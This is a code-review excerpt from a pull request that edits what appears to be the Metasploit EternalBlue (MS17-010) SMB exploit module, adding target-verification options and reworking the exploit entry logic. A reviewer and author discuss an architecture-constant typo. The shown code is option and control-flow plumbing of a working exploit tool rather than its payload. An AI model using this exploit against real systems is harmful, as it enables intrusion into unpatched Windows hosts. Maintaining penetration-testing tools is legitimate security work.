modules/exploits/windows/smb/ms17_010_eternalblue.rb

```diff
@@ -42,96 +42,1012 @@ def initialize(info = {})
         OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
         OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
-        OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])
+        OptString.new('SMBDomain', [
+          false,
+          '(Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7,' \
+            ' Windows Embedded Standard 7 target machines.',
+          ''
+        ]),
+        OptBool.new('VERIFY_TARGET', [
+          true,
+          'Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded' \
+            ' Standard 7 target machines.',
+          true
+        ]),
+        OptBool.new('VERIFY_ARCH', [
+          true,
+          'Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7,' \
+            ' Windows Embedded Standard 7 target machines.',
+          true
+        ])
       ]
     )
     register_advanced_options(
       [
         OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
-        OptInt.new('MaxExploitAttempts', [true, 'The number of times to retry the exploit.', 3]),
         OptInt.new('GroomAllocations', [true, 'Initial number of times to groom the kernel pool.', 12]),
-        OptInt.new('GroomDelta', [true, 'The amount to increase the groom count by per try.', 5])
+        OptInt.new('MaxExploitAttempts', [
+          true,
+          'The number of times to retry the exploit. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded' \
+            ' Standard 7 target machines.',
+          3
+        ]),
+        OptInt.new('GroomDelta', [
+          true,
+          'The amount to increase the groom count by per try. Only affects Windows Server 2008 R2, Windows 7, Windows' \
+            ' Embedded Standard 7 target machines.',
+          5
+        ])
       ]
     )
 
   end
 
-  class EternalBlueError < StandardError
-  end
-
   def exploit
     check_code = check
-    unless check_code == CheckCode::Vulnerable || datastore['ForceExploit']
-      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+
+    if check_code.code == 'vulnerable'
+      print_good('The target is vulnerable.')
+    else
+      print_bad('The target is not vulnerable.')
+    end
+
+    if datastore['ForceExploit'] == 'true' || check_code.code == 'vulnerable'
+      print_status('Forcing Exploit') if datastore['ForceExploit'] == 'true'
+
+      if check_code.details[:os].start_with?('Windows 2012', 'Windows 8.1', 'Windows 10 Pro Build',
+                                             'Windows 10 Enterprise Evaluation Build')
+        self.extend(EternalBlueWin8)
+      else
+        if check_code.details[:arch] == ARCH_X84
```

Comment:
```suggestion
        if check_code.details[:arch] != ARCH_X64
```

We made this change in order to get around an error we were encountering while testing.

## Error
![image](https://user-images.githubusercontent.com/69522014/119785761-6b209980-bec7-11eb-8cd7-3341b70340a1.png)

Reply:
Sorry about the above, this is a copypasta error. Should have been `ARCH_X86`